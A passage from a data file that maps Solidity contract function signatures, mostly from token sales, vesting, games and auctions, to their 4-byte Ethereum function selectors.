"isSecurityToken(address)": "0xd300a968", "getSecurityTokenData(address)": "0x8f9bbf16", "getSecurityTokenAddress(string)": "0xfb621f14", "setProtocolVersion(address,bytes32)": "0x1dd14317", "generateSecurityToken(string,string,string,bool)": "0xc37792b5", "deployToken(string,string,uint8,string,address,bool,address)": "0xc85fd4f8", "EDUTURN()": "0x6b08a833", "HighEndTreasureChain()": "0xf6f54833", "METAHASHCOIN()": "0xd1dc72a0", "ETHERlemon()": "0x4141a121", "setSoldTokens(uint256)": "0xeaced5b7", "HazzaTokenInterface()": "0xd8412808", "publicTransferToken(address[],uint256[])": "0x9908b25b", "bountyTransferToken(address[],uint256[])": "0xf958530f", "grantPrivatePurchaserToken()": "0x09cf8766", "grantFounderToken()": "0x27413437", "grantFoundationToken()": "0xd999741e", "grantBackerToken()": "0x71daca00", "HazzaToken()": "0x45fd865a", "getPrivatePurchaserStatus(address)": "0x0c31309e", "addPrivatePurchaser(address,uint256,uint256,uint256)": "0xe5db2612", "getFoundationStatus(address)": "0xf5383f3a", "addFoundation(address,uint256,uint256,uint256)": "0x5e675098", "getFounderStatus(address)": "0x1d724a7a", "addFounder(address,uint256,uint256)": "0xc41fbbb5", "getBackerStatus(address)": "0xbcd85b6d", "addBackers(address,uint256,uint256)": "0xbb280cba", "getAdvisorStatus(address)": "0x2eb61d15", "addAdvisors(address,uint256,uint256)": "0xd2840362", "newSubdomain(bytes32,bytes32,bytes32,address,address)": "0x7072aaa3", "setDomainOwner(bytes32,address)": "0x671ec66c", "releaseLocked()": "0x510040cb", "lockedCounts()": "0x395acdeb", "unlock(address,uint256,uint8)": "0x5fc2b479", "transferLocked(address,uint256,uint8)": "0xcc8c0f9f", "available(address)": "0x10098ad5", "erc20VARA(uint8)": "0xb6aeb4a2", "RxI()": "0xe0a827c6", "convertRegularToRewardTokens(address,uint256)": "0xd5d1b95a", "paymentRewardTokens(uint256)": "0x841eb7f8", "paymentRegularTokens(uint256,uint256)": "0x803fbe5b", "paymentMixed(uint256,uint256,uint256)": "0xd39ce83a", "paymentRewardTokensPriority(uint256,uint256)": "0xd38cba4b", "paymentRegularTokensPriority(uint256,uint256)": "0x13a5aac7", "getRewardToken(uint256,uint256)": "0xcadd888b", "updateRewardPercentageByIndex(uint256,uint256)": "0x5adfafdf", "addRewardPercentage(uint256)": "0x9c1747e5", "removeAddressesFromAdmins(address[])": "0x8ee365fa", "addAddressesToAdmins(address[])": "0xa289409b", "initialSupplyAddress()": "0x063e7451", "PRE_SALE_TOTAL_TOKENS()": "0x35109cc6", "claimsCreated()": "0x5f495491", "pausingMechanismLocked()": "0x90912d09", "BOUTSPRO_AMOUNT()": "0xcdfd293b", "vestingToken()": "0x19d152fa", "maximumPercentageOfDaysSupply()": "0xdaa1d7d4", "noAdvert()": "0x64b9ca08", "hydroStakingMinimum()": "0x9c049dd0", "divForTransfer()": "0x134c021b", "importedTokens()": "0x0c823abe", "initialTokenValue()": "0x190bfcd0", "minHEXCap()": "0x5da3d3d2", "DropReward()": "0x53ac36f4", "WitdrawLenderProfit()": "0x6006f178", "ETHXBT()": "0xb7764475", "crowdsaleCounter()": "0xc83780a2", "seriesBSupply()": "0xf4d5d6ce", "SUPPLY_FOR_SALE()": "0x48224f67", "claimHodlReward()": "0x4b86faba", "gameNumber()": "0xd8d40cee", "STARTBLOCKTM()": "0x0bdc0031", "LARGE_PURCHASE()": "0x61dbbc80", "numOfRare()": "0x58aa0f1b", "sponsoredJackpotMin()": "0x5ed65228", "nextTaskId()": "0xfdc3d8d7", "allowTransferGlobal()": "0x7142087c", "receiver2()": "0xb6015204", "TOKENS_TOTAL()": "0x0b743021", "address4a()": "0x38d084b5", "ALLOC_AIRDROP()": "0xef5ba9ed", "PLAYER_TURN_SINGLE_PERIOD()": "0xef548aaf", "airdropOn()": "0x4f5ba601", "bountyAmountLeft()": "0x44fbaf08", "investAmount()": "0x0311904c", "mintingStopDate()": "0x4a367827", "ICO_ADDRESS()": "0xf02895e4", "houseFeeHoldover()": "0xc9fa8f2d", "marketSupply()": "0xbafb8e83", "chunkNr()": "0xd998d0d5", "crowdsaleTargetUBO()": "0xb32c41d7", "fountainContractAddress()": "0xe5e75fee", "EXT_COMPANY_TWO()": "0x9f44b34c", "millionDollarTokenReward()": "0xbd22b1cb", "getRamdomness()": "0x09d02b74", "DURATION_VIPPLACEMENT()": "0x4d7a7577", "advisorsTokensSecondReleaseTime()": "0x455778ed", "takenProfit()": "0x337b68ba", "fundingActive()": "0x3152dd00", "MIN_FREEZE_DURATION()": "0x973b56e8", "set_got_refunded()": "0x617f4e3e", "previousContract()": "0x78954b3b", "milestoneSystem()": "0x8aff794d", "partnerSupply()": "0x036b3a81", "targetDiscountValue9()": "0x104a5963", "maxAllowedManualDistribution()": "0x967826df", "ecosystemTokens()": "0xcc89e8bc", "mintMode()": "0x788c5999", "url_white_paper()": "0x2344b0e5", "firstTTaxAmount()": "0x28d005e9", "coresale()": "0x2d3b4643", "tokenEmission()": "0x74912463", "defaultIcoDeadline()": "0xf85f3b7f", "weiMinimumLimit()": "0x1540fe22", "MINIMAL_PURCHASE()": "0xcdfbc8f1", "zonesSwarmAddress()": "0xa2a84a5d", "RATING_EXPAND_INTERVAL()": "0x2a6c703b", "guardian2()": "0x5cf5e386", "sellsTokens()": "0x4ca50f59", "finalizeStartTime()": "0x6e752548", "surplusTokens()": "0x260edaaa", "createTestData()": "0x9909d1a2", "mtcRate()": "0x090bb93f", "priceStages()": "0x617fc592", "matchpoolAddress()": "0x2d9068ed", "hasTwoStepWithdraw()": "0xa323af85", "balance2()": "0x40441eec", "SUPPLY_HARD_CAP()": "0x80ddcc62", "preTgeTokenSupply()": "0x6b930927", "CMC()": "0xb250ce21", "JOINT_PER_ETH()": "0x715f8975", "month24Allocated()": "0x0ff58f40", "BONUS_REWARD()": "0xe3c3ec92", "BONUS_DAY3_DURATION()": "0x220d8707", "releaseFounderCoins()": "0x676796b6", "maxLockPeriod()": "0x4b1d29b4", "latestUnlockStage()": "0xc148002c", "chancesBought()": "0x629ad124", "numMC()": "0x31b5da2a", "defaultToken()": "0x74c13fda", "sellPriceEth()": "0x015129a1", "minimumStake()": "0xec5ffac2", "account_address()": "0x661be157", "isLiquid()": "0x5d272468", "accountData()": "0x7a28f8bc", "minimumValue()": "0x849aaf8e", "pullTheLever()": "0x384b93f2", "individual_cap()": "0x111485ef", "WHITELIST_SALE_LIMIT()": "0x65066810", "contributorCounter()": "0x77921952", "setLatestPayday(address,address,uint256)": "0x7f654b1c", "setLatestTokenAllocation(address,address,uint256)": "0x8b0b9cac", "setSalaryToken(address,address,address,uint256)": "0xdc4243f1", "setPeggedToken(address,address,address,uint256)": "0xc69a00be", "clearAllocatedAndSalaryTokens(address,address)": "0x7d22e9df", "setAllocatedToken(address,address,address,uint256)": "0x90895e1c", "setAddress(address,address,address)": "0x3be08dab", "add(address,address,uint256,uint256)": "0x4efd1551", "getEmployee(address,address)": "0x3ca6b228", "funcFromC2()": "0xbc607f7b", "executeOffer(uint256,bytes)": "0x606d0d14", "confirm(uint256,bool)": "0x8c55284a", "newOffer(address,uint256,string,uint256,uint256)": "0x5552a483", "markComplete(bytes32)": "0x346a37d2", "associateWithFile(bytes32)": "0xcabcaaa0", "Task(bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0xe742f18a", "isBotAt(address,uint64)": "0x53d3ed60", "isBot(address)": "0x3bbac579", "disableBot(address,uint64)": "0x5f58ed2a", "enableBot(address)": "0x27329b05", "BotManageable(address)": "0x295d2d69", "fixedExp(uint256,uint8)": "0x24fd5585", "findPositionInMaxExpArray(uint256)": "0xce784564", "floorLog2(uint256)": "0x45b8bafc", "ln(uint256,uint256)": "0x44f7787f", "power(uint256,uint256,uint32,uint32)": "0x32833d51", "BancorFormula()": "0x43398685", "awardSellers()": "0xb6f29d50", "awardBuyers()": "0x58eae004", "evaluateOdds()": "0x61cc576d", "cancelIncompleteOrders()": "0x70e18692", "buyOrder(uint256)": "0x22f85eaa", "sellOrder(uint256)": "0x97514d90", "ordersLength()": "0xbe8acd3f", "PredictionMarket(uint256)": "0x4dbfb6fb", "InitPeculiumAdress(address)": "0xebd3d58a", "Delivery()": "0x5ef6ad57", "evaluateAfterQuery(bool,uint256)": "0xde3ab731", "evaluateBet()": "0x0a7a0807", "queryOracle(string)": "0xe432f0e5", "determineWinner(uint256)": "0xefe43338", "closeBetting()": "0x15ac534d", "placeBet(uint256)": "0x10fe7c48", "hasBet(address)": "0x136f1016", "create(string)": "0xb6a46b3b", "isEmpty(string)": "0x27341c8a", "Bet()": "0xc8a76494", "setDonationProportion(uint256,uint256)": "0x3aa935cb", "payAndDonate(address,address)": "0x41ad785e", "Y(uint256,uint256)": "0x6919d09a", "create(address[],uint256)": "0xf8f73808", "subSupply(uint256)": "0x412988e7", "addSupply(uint256)": "0x40753a76", "setDecimals(uint256)": "0x8c8885c8", "approveInternal(address,address,uint256)": "0x56189cb4", "getStore()": "0xc2722ecc", "setStore(int256)": "0x51c8e02a", "multStore(int256)": "0xd78db648", "Test(int256)": "0xbc10ce84", "setUint64(int64,uint64)": "0xfba26207", "ManagerProxyTargetMockV2(address)": "0x4c3a9675", "findItem(address[],address)": "0xdbbd7934", "citation(uint256)": "0x409242fc", "author(uint256)": "0xec4eb442", "authorCount()": "0xb6e3cc1a", "citationCount()": "0x81884756", "signAuthorship()": "0xa437e07a", "removeAuthor(address)": "0xe97193a6", "removeCitation(address)": "0x9df39b4a", "citePaper(address)": "0x0ca9897c", "addAuthor(address)": "0x2ddbc97e", "title()": "0x4a79d50c", "dataAddress()": "0x1b655054", "authorSigned(address)": "0x9528d109", "MinimalManuscript(bytes32,string)": "0xd4dfc4b9", "declareHanged(address,uint256[])": "0x5c659bdb", "getHigherInstance()": "0xd5375a5c", "StaticArbiter(address[])": "0x3bdff827", "SplitPayment(address,address)": "0x973d641e", "getHashRevealEnd()": "0x06d19d68", "getHashSubmissionEnd()": "0x04126ce5", "getMostRecentAuctionStart()": "0xf56a5176", "revealBid(uint256,uint256,bytes32)": "0x4d380a0d", "commitBid(bytes32,string)": "0xe7e1e69f", "initialize(address,uint256,uint256,uint256,uint256)": "0xf92ad219", "TwoPhaseAuction()": "0x3e5b7fec", "getTokenSold()": "0x94d77363", "getEtherRaised()": "0xe876bdef", "crowdsaleOn()": "0x02dd92c4", "preCrowdsaleOn()": "0x6649dfd5", "perAddressCap()": "0x47dd5172", "returnRate()": "0x7c2ffbb3", "acceptFoundationTransfer()": "0x152af8f9", "cancelFoundationTransfer()": "0xf2a69417", "proposeFoundationTransfer(address)": "0x84b35fbb", "buyRecipient(address)": "0x11a4c710", "OpusToken()": "0x49602f5c", "executeBet(address,address,bool,uint256)": "0x72ea8bfe", "lockedBalanceOf(address)": "0x59355736", "unlockBalance(address,uint256)": "0x0426dcef", "ceoWallet()": "0x389cabee", "nominPool()": "0x87b9e310", "ico2receivedTotal()": "0xafef07da", "caged()": "0xf83e5793", "lastBlock_f0()": "0xf7253071", "commission_mom()": "0xa7da611f", "MAXIMUM_CONTRIBUTION_LIMITED_PERIOD_USD()": "0x8704c6ac", "maxTrainerLevel()": "0xd8819e0a", "DECIMALS_MULTIPLIER()": "0xbbdd366a", "firstRefundRoundRateNumerator()": "0x08016f6d", "maxSpend()": "0x3c3f4c63", "sale_period()": "0x9472b32c", "ethToBeDistributedSet()": "0xf5fd2108", "getAdminAccounts()": "0x133c5ff5", "miniMeToken()": "0x6423b5f0", "price1()": "0x6caf25ce", "nextController()": "0x2c1ea461", "dynamic()": "0x4bd54f04", "teamEthTransferComplete()": "0xd70925b4", "hodler()": "0x3bc58532", "tokenActive()": "0x493a8d0c", "bthFundDeposit()": "0x293877d7", "ballotStarted()": "0xe3aec30c", "claimCrystal()": "0x0c69b189", "maxToSell()": "0x504291f0", "presaleBonusTokensClaimed()": "0xc31c6855", "TeamLockingPeriod12Months()": "0xb64d44f1", "botPhase()": "0xac42f446", "kRate()": "0xce691294", "r1()": "0x6ca5b5b0", "DST_ADVISERS()": "0xffa32d1c", "operationsFundAddress()": "0x907be394", "howManyEthersToChangeSymbolName()": "0x752fc70e", "FOUNDATION_HOLDER()": "0x23967d78", "totalSupply1()": "0x976d36d0", "deleteToken()": "0x4123a0ac", "numStakers()": "0x6c8b052a", "currentDate()": "0x4f99b7c5", "withdrawCount()": "0x4cc05a71", "notSoldTokens()": "0x052a829c", "RESERVED_TOKENS_FOR_ICO_BONUSES()": "0x86ab3f7b", "claimMaxAmount()": "0x51430cb3", "requiredEntries()": "0x32495c58", "stakeCommence()": "0x4d91c096", "fourthTokenExchangeRate()": "0xd735140d", "waitingForClaimTokens()": "0x57a967ca", "endTime_()": "0xd7fb4f1d", "MOACSupply()": "0x8e7296b1", "hat()": "0xfe95a5ce", "fog()": "0x7296359a", "minForExistingTopic()": "0x9545c42c", "token_iso_price()": "0x34ffea2c", "release12m()": "0x2f0989ec", "investorWalletAddress()": "0xcb985708", "lastBlock_v8()": "0xd431ba8e", "preFundingtokens()": "0x02742425", "reservedTokensLockedPeriod()": "0xf5166eea", "icoSold()": "0x5b29f2e4", "oneweek()": "0xbf5c844b", "stageStartTime()": "0xcaeafe6a", "SALE_RATE()": "0x888f2b13", "founderTokensAllocated()": "0xf33dc1fa", "deathData_v18()": "0x7b550233", "tier4Rate()": "0x48c834c0", "tokenCollector()": "0x271af8c1", "GRANT_BATCH_SIZE()": "0xfa73af0b", "endPreICOStage2()": "0x2111871c", "MyTestWallet7()": "0x22d122a9", "firstRoundICOEnd()": "0x04651a1e", "MINIMAL_INVESTMENT()": "0xde1e8de8", "maxRacers()": "0x040c3a53", "claimedPrepaidUnits()": "0x538df6f2", "purchaseRate()": "0x48c26e22", "PGO_UNLOCKED_LIQUIDITY_CAP()": "0x6c0b66b9", "devFeesAddr()": "0x89ce555c", "expanded()": "0xecf9ea1d", "minimumHydroStakeUser()": "0x2b45bcf9", "ObokContract()": "0x45ccd426", "PHASE_OPEN()": "0x6d40f3b0", "tradeSpreadInvert()": "0x3724fb24", "heapSort(uint16[])": "0x508f352d", "lockedFundsSeconds()": "0xff5e7d4d", "exchangeRateForBTC()": "0x88f5eb36", "allowClaiming()": "0xde733397", "partnerWallet()": "0x1ed7830e", "tokenSwap()": "0x9653dee5", "lifeReserveWallet()": "0x9c591412", "vote02NoCount()": "0x17a7eb4c", "AgriChainDistribution()": "0x3cbe7309", "Management()": "0x7b89a582", "lockDate()": "0x649ae9c6", "pre_start()": "0x89f0ccba", "cycleCount()": "0x316fda0f", "execBoard()": "0xb8005f38", "ratePerHourInWei()": "0xacb93f36", "bitpaintingStorage()": "0x17904743", "countPartnerPlayers()": "0x0e3a997e", "secondWavePrice()": "0x24ee62ee", "checkCrowdsaleBalance()": "0x26848b68", "ptToPtwo()": "0xc893ae0b", "changeAllowTransferState()": "0xc04c68eb", "Manager()": "0x78357e53", "default_helper()": "0x5259347d", "claim_bounty()": "0x02f58015", "add_to_bounty()": "0x62f5ed61", "activate_kill_switch()": "0x70144f8f", "ZiberToken()": "0xbb889341", "backTokenOwner()": "0x7789f844", "setHighWater(uint256)": "0x41522e41", "getHighWater()": "0x38e47639", "changeCompanyWallet(address,address)": "0xbc5d066e", "setCap(uint256)": "0x47786d37", "setTimes(uint256,uint256)": "0x22434836", "setMinValue(uint256)": "0xdb91774c", "setMaxValue(uint256)": "0x9984f30d", "setRound(uint8)": "0xcbd5bb2b", "getContributionsForAddress(address)": "0xeaf82213", "getContributors()": "0xaf157c19", "trackContributions(address,uint256)": "0xc41c19dc", "IntimateShoppe(uint256,uint256,uint256,address,address,address,address,uint256,uint8)": "0xf4e96093", "bulkTransfer(address[],uint256[])": "0x153a1f3e", "removeSeenAddress(address)": "0x98bca41a", "trackAddresses(address)": "0xb1700e61", "BasicTokenStorage()": "0x994162cd", "balanceOf(uint256)": "0x9cc7f708", "returnAccounts()": "0x1ef60485", "numberAccounts()": "0x80059593", "unfreezeAccount(address)": "0x788649ea", "freezeAccount(address)": "0xf26c159f", "isFrozen(address)": "0xe5839836", "Freezable()": "0xcc91e91c", "recoverToken(address,address)": "0xfeaea586", "recoverEther()": "0x52d8bfc2", "toggleAuthorization(address,address,bytes32)": "0xdd91f1f5", "isAuthorized(address,address,bytes32)": "0x24a8e11d", "SnapshotAndDistributePot()": "0x728cd741", "WithdrawDevFunds(uint256)": "0xb3d34e1b", "WithdrawPotShare()": "0x33ad9495", "BuyHandler(uint256)": "0x9d7354c0", "Attack(address)": "0xbc346c9c", "BuyTroop(uint256,uint256)": "0xb4e6f92b", "BuyBooster()": "0xfdade29f", "BuyUpgrade(uint256)": "0x0116bfc0", "UpdateMoneyAt(address)": "0x56f1594e", "UpdateMoney()": "0x2e48f65d", "UpgradeRigETH(uint8,uint256)": "0xbadb2e5a", "UpgradeRig(uint8,uint256)": "0x6f3165d3", "StartNewMiner()": "0xf362b9af", "GetPriceOfTroops(uint256,uint256,uint256)": "0x90a0a2ab", "GetPVPData(address)": "0x5b1fef12", "HasBooster(address)": "0xaf299510", "GetBoosterData()": "0xbd1f7d52", "GetGlobalProduction()": "0x56a4e7f9", "GetProductionPerSecond(address)": "0x036a66eb", "GetPotInfo()": "0x6e4dd931", "GetPriceOfRigs(uint256,uint256,uint256)": "0x34f682e2", "GetMinerAt(uint256)": "0xd291fa81", "GetTotalMinerCount()": "0x996f7602", "GetMinerData(address)": "0xcc0f65f7", "GetRigData(uint8)": "0x1f979e23", "GetNumberOfRigs()": "0xb336f8a3", "RigIdle()": "0xb438a2d0", "sumOfN(uint256,uint256,uint256,uint256)": "0x1d5e3f6d", "rescueTokens(address,address,uint256)": "0xcea9d26f", "BB()": "0x5727dc5c", "ParyToken(string,uint8,string)": "0x9970e26b", "tokens_buy()": "0x6c675ae6", "cards_start_total()": "0xcbe23b94", "cards_blue_total()": "0xdcc42e9b", "cards_titanium_total()": "0x767bc136", "cards_gold_total()": "0xf45934b6", "cards_black_total()": "0x6fbe769d", "CentraToken()": "0x6ef27042", "transferImpl(address,address,uint256)": "0xe391bda5", "ShitToken()": "0x5446d669", "setReleaseTime(uint256)": "0xab05bfff", "tokenLocked()": "0x6a630559", "secondsRemaining()": "0x940ebef7", "currentTimestamp()": "0x1e2ff94f", "releaseTimestamp()": "0x0a3f013f", "releaseToken(address)": "0xe545f941", "WaltonTokenLocker()": "0xe0fe9ccf", "CYB(uint256,string,string)": "0x4a588d87", "retrait_5()": "0x7055410b", "retrait_4()": "0xff9151dd", "retrait_3()": "0x0a642d00", "retrait_2()": "0xefbb5f17", "retrait_1()": "0xf3acc06b", "getDepositary_function_control()": "0xfb5d5999", "setDepositary_function_control(uint256)": "0x2dbce390", "getDepositary_function()": "0x4afbb7d7", "setDepositary_function(uint256)": "0x0160751c", "getCmd_control()": "0xd70108a6", "setCmd_control(uint256)": "0x78238cf0", "getCmd()": "0xb10c7544", "setCmd(uint256)": "0xf3cee64d", "getID_control()": "0x8bec683f", "setID_control(uint256)": "0xc2a029f0", "getID()": "0xab9dbd07", "setID(uint256)": "0xdc5d184f", "FhnwToken()": "0x3137f3d4", "getPaidAmount(string)": "0xb3b0eae5", "withdraw(address,uint256,string)": "0xe088747b", "NobeToken()": "0x144cbdfd", "getArrayHashMarketItem(bytes16)": "0x9d3c3b5d", "selfairdrop()": "0x45950cd4", "setselfrdroplist(address[])": "0x67e70e99", "setselfdropamount(uint256)": "0xc2239daa", "xorexs()": "0xcf12d99f", "reDistribution()": "0xe81c2fec", "TCETest()": "0xc43d9ac9", "BreakbitsToken()": "0x3575ecc6", "PubToken(uint256)": "0x4f4ec991", "getInvestorDividendsAmount(address)": "0xb1ad4c48", "doRestart()": "0x786ecf16", "payoutSelf()": "0x702510be", "addInvestors(address[],uint256[],uint256[],address[])": "0xa805bfef", "RAIT()": "0x837d52d8", "transfermulti(address[],uint256[])": "0x948759d5", "allocateArrayOfTokens(uint256,address[])": "0x24f9702e", "STCDR()": "0xcd5617b6", "giveRightToVoteByBatch(address[])": "0x063bac1f", "BllotPro(bytes32[])": "0x60616ae2", "santToken()": "0x118b0f04", "IGMathsContract()": "0xdbd16774", "burnAndDist()": "0x174c2002", "L19_Token()": "0x8b5c37c3", "VitaminToken()": "0x80a429ee", "buyNapkins()": "0x67630f43", "Mantapjar()": "0x53a6e2c9", "gettotalCards()": "0xb987f688", "gettotalCardValue()": "0xd5c96b36", "getCardDivs(uint256,uint256)": "0x4e3c2f47", "getCardDivShare(uint256)": "0x04dd2dea", "gettotalCardDivs(uint256)": "0x5bdff855", "getcardOwner(uint256)": "0x1b7e0902", "getcardPrice(uint256)": "0x1ae4dfb7", "addNewcard(uint256)": "0x9ba65fff", "setcardPrice(uint256,uint256)": "0x4b419b5f", "distributeDivs(uint256)": "0x892e0614", "addtotalCardValue(uint256,uint256)": "0xc84640f5", "sendbal(address,uint256)": "0x73c2ec65", "CheckOut()": "0x8d860880", "updateLockDate(uint256)": "0x9e5ece98", "BiXuTo()": "0xec7fea7b", "MetaMorph()": "0xc4cf9385", "disapprove(uint256,string)": "0x1b76dd7c", "approve(uint256,string)": "0x72405ab0", "KAL6Token()": "0x2f5552f5", "EWWCOIN()": "0x40ce1d43", "BlangsakToken()": "0x52f84b1b", "BajwaToken()": "0xb47481a9", "transferByThirdParty(uint256,address,uint256,uint8,bytes32,bytes32)": "0xee6891af", "editTokenProperties(string,string,int256)": "0x8b969c33", "initializeCrowdsale(address,uint256)": "0xc1bd8ecb", "getRefundAmount(address)": "0x5d306f34", "changeMaxDepositAmount(uint256)": "0x300c229f", "changeMinDepositAmount(uint256)": "0x8caad7b5", "AOK()": "0xb6027026", "_freeze(address,uint8)": "0x5ba92d7d", "ammount()": "0x5b889ab8", "SMLToken(address)": "0x50d8bcf3", "BitcoinDominatorERC20Token()": "0xab7b347c", "LagToken()": "0x44aa5782", "PieceStandardToken(uint256,string,uint8,string)": "0xdd324fe7", "HelperSearch()": "0x07c8fb5a", "MarvinCoin()": "0x8ee17e0a", "THANKSTEST()": "0x8873d247", "lhkjTNB()": "0x68c51f8e", "executeWill(address)": "0xe854d135", "checkAccount()": "0x5c13a439", "BNBB(uint256,string,uint8,string)": "0xa0831fdb", "receivePayment(uint256,uint256,bytes)": "0x7edee605", "TwentyOneMillionToken(address,uint256)": "0x97971c69", "Muggelo()": "0x4dee529a", "newUriBase(string)": "0x879499f4", "CrypthubtTokenTest()": "0x043aea8b", "changeGoodBye(string)": "0xe10be707", "sayGoodbye()": "0x6452f344", "changeHello(string)": "0x615ea899", "GCFcoinF(uint256,string,string)": "0xfbc032ab", "doSendWithSignature(address,uint256,uint256,bytes,uint256,bytes,bool)": "0xbae1c1ac", "doMint(address,uint256,bytes)": "0x8f632311", "removeDefaultOperator(address)": "0xe699e8c3", "addDefaultOperator(address)": "0x1b7d83e5", "transferWithSignature(address,uint256,uint256,bytes,uint256,bytes)": "0x1c09496a", "sendWithSignature(address,uint256,uint256,bytes,uint256,bytes)": "0x6b1fbfdb", "setTokenBag(address)": "0x6cbb1afa", "completeDefaultOperators()": "0x977cdc7e", "permitTransfers()": "0xf1261fce", "SuperNanoCoin()": "0x2a9b6975", "createCustomReservation(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd72e3de1", "setMaxSubscribers(uint256)": "0x3405ae40", "numSubscribers()": "0x9c7ab767", "DAVCoin()": "0x55dc3b65", "BTestToken(address,string,string,uint256,uint256)": "0x43021054", "orgy1f(string,string)": "0xe46feb2c", "createRecord(string,uint256,address,string,string,string)": "0x5597f3a5", "getRecordsCount()": "0x505158bb", "spitnetwork()": "0x140ad293", "numberOfTokensAllocated()": "0x5ad35ac0", "DURATION_NONUSETEAM()": "0xa2bf1d06", "gen0AuctionDuration()": "0xeb845c17", "KYC_ROLE()": "0xf9c8dec3", "AirRewardTotalSupply()": "0xe18fe709", "opponentAmount()": "0xbeee5852", "stakeMinAge()": "0xcbd8877e", "iteration()": "0x0c0399a4", "etherollBeneficiaryAmount()": "0x1671055d", "StgTwobonusEnds()": "0xfac50e4c", "FLIPPINESS()": "0x372e80c3", "lastStageSubmitted()": "0x1b79a2f3", "secondaryWallet()": "0xf66a79a0", "totalBet()": "0xfe5e1853", "QUORUM()": "0x2e80d9b6", "minSwapAmount()": "0x338246e2", "GOVERNANCE()": "0x14627834", "MAX_BID_FRAC_TOP()": "0x8a7ed05c", "ChillIssued()": "0x695338b9", "sumHardCapICOStage8()": "0x5654b526", "newCash()": "0x503de95b", "ROLE_WHITELISTED()": "0x18b919e9", "COLOR_RED()": "0x58d90108", "exchangeEtherForNomins()": "0x407fb687", "EVMSCRIPT_REGISTRY_APP_ID()": "0x60b1e057", "buy_bounty()": "0x15248362", "coinMinted()": "0xff81c554", "blockHeight()": "0xf44ff712", "MinedBlocks()": "0x59291e2f", "migrationMaster()": "0x676d2e62", "whiteList()": "0x3544a864", "roundLength()": "0x8b649b94", "coinsRemaining()": "0xdde82c2d", "periodITO_softCapInWei()": "0x5d685185", "walletOut1()": "0xa9324192", "reserveWallet()": "0xd72b11bd", "etherTotal()": "0x4dfb4807", "saleDateFinish()": "0x659ae215", "searchSeed()": "0xae4f1476", "endBetBlue()": "0xaf62cfd2", "stage3Deadline()": "0x8006692f", "SETUP_DONE()": "0x7a4093b8", "capitalization()": "0xa62ce8ce", "playerEther()": "0xebcfd922", "PRESALE_SECOND_DAY_START()": "0x5ce75c7c", "failCrowdsale()": "0x94741017", "gType()": "0xa46d11dc", "founderAllocated()": "0x99d22e48", "currentGameBlockNumber()": "0x4257d3e0", "ethRedeemed()": "0x9640da30", "Britishcoin()": "0xbe19d926", "endPrivateICO()": "0x5d3cd79f", "transferDisabled()": "0x892dfdf6", "callDistributed()": "0x0ba1772d", "totalVCCoin()": "0xbeea887c", "freeCrawDeadline()": "0x7dce6bdb", "exchangeETH()": "0xcfa5f02a", "tokenMaxSupply()": "0xf99cc96e", "availablePrivateICO()": "0x8709bece", "serverSeedHash()": "0x7382901e", "FreezeAddress()": "0x990eda99", "REQ()": "0xd2670025", "maxAmountToSell()": "0x414c4a8d", "backendContract()": "0x6f752f09", "currentNiceGuy()": "0xd377dedd", "totalTokensToSupply()": "0xc401d6b0", "masterCopy()": "0xa619486e", "_founder_two()": "0x404ed1fa", "walletTokenTeam()": "0x93c5ace0", "privateSale()": "0xba1f879f", "minPersonalCap()": "0x0cefa4de", "rewardsWithdrawalRecipient()": "0x165c86df", "totalEthReceivedInWei()": "0x8858fa3b", "maxAllowedReservingPercentage()": "0xb9f2d592", "walletBlogs()": "0x5579ff8e", "fullSupplyUnlocked()": "0x7c197c09", "tradingEnabled()": "0x4ada218b", "vettingTime()": "0x976a0b82", "animatorAddress()": "0x703add31", "openingTimePeriodOne()": "0x29e46d3f", "totalEthCharityRecieved()": "0x91a266ac", "bonusUnlockAt()": "0x28680c1e", "PLAYERWIN()": "0xdf5a1417", "addressOfTokenUsedAsReward2()": "0x5f7cbc39", "notDistributedAmount()": "0xf9a57ae4", "sitExchanger()": "0x7e81701a", "kimsCreated()": "0x1ac58dd5", "secPerBlock()": "0x4ee1d045", "sweepsState()": "0x35785e09", "PRIZE()": "0xc05390f6", "transferStop()": "0x6780a311", "tabsOneEthCanBuyICO()": "0xc276963f", "ICO_PRICE4()": "0xcc442c3f", "marketRegisterCost()": "0x76d76b9d", "luckyPendingIndex()": "0xda51bbd9", "stakePeriod()": "0xc1699a99", "platformWalletAddress()": "0x9f2a6374", "RcdGet()": "0xbe2f3059", "tokenVestingAddress()": "0xbc364d7b", "eachUserWeight()": "0xf1ce37d9", "getEndDate(string)": "0xc04198f3", "isWarrantyValid(string)": "0xd6779d6f", "claimWarranty(string,uint256,string)": "0x5bb59815", "requestWarranty(string,address,uint256,uint256)": "0xf4c6f423", "updateCalculator(address)": "0xb5d011fd", "Epam()": "0x5ef74958", "getPrice(string,string,uint256)": "0x0efd3d5b", "read(bytes)": "0x8bf4515c", "percPoints(uint256,uint256)": "0x6fff15ee", "percOf(uint256,uint256)": "0xcf12789a", "percOf(uint256,uint256,uint256)": "0xcac3f6c9", "validPerc(uint256)": "0xec736b67", "Normal(uint8)": "0xdcbf16d4", "addThing(string,bytes32,string,bytes32)": "0x50107c77", "f3(uint256)": "0xd7b7913b", "f2(uint256)": "0xbf3724af", "f1(bytes32)": "0x24743d40", "removeTokenFrom(address,uint256)": "0x1c1f6a3f", "addTokenTo(address,uint256)": "0x490c58f0", "_setTokenURI(uint256,string)": "0x01538868", "tokenByIndex(uint256)": "0x4f6ccce7", "tokenURI(uint256)": "0xc87b56dd", "ERC721Token(string,string)": "0x9f8aef2b", "decline()": "0xab040107", "PeerReview(address,bytes)": "0x7235c8dd", "emitSkillSet(uint256,uint256,uint256,bytes32)": "0x0605d0cd", "emitCategorySet(uint256,uint256,bytes32)": "0x2a16a9ee", "emitAreaSet(uint256,bytes32)": "0xe788b5eb", "_emitSkillSet(uint256,uint256,uint256,bytes32)": "0xf527dd6c", "_emitCategorySet(uint256,uint256,bytes32)": "0x779c9b19", "_emitAreaSet(uint256,bytes32)": "0x71d49910", "setSkill(uint256,uint256,uint256,bytes32)": "0x5f65d621", "setCategory(uint256,uint256,bytes32)": "0x7749e693", "setArea(uint256,bytes32)": "0x658bf147", "getSkill(uint256,uint256,uint256)": "0x4594762a", "getCategory(uint256,uint256)": "0x4edbca6e", "getArea(uint256)": "0x6490c7a8", "_isOddFlag(uint256)": "0x4aef8b7c", "_isSingleFlag(uint256)": "0x3f935379", "sealed()": "0xe4b203ef", "CampaignToken()": "0x02949bff", "executeWinningProposal()": "0xf0adcedb", "setProxy(address)": "0x97107d6d", "getZombiesByOwner(address)": "0x4412e104", 